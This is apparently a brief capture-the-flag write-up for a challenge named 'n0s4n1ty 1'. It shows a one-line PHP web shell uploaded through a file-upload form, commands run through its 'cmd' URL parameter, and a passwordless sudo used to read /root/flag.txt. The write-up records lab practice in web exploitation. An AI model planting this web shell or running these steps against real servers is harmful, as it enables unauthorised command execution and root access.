n0s4n1ty 1
n0s4n1ty 1
CHALLENGE DESCRIPTION
SOLUTION
Upload our payload
1
<?php system($_GET["cmd"]); ?>
We can see that our file is located at /uploads/[file]
Now we inject to the URL /uploads/[file].php?cmd=sudo -l
We can see its respond NOPASSWD: ALL
Now it will be easy for us, do this sudo cat /root/flag.txt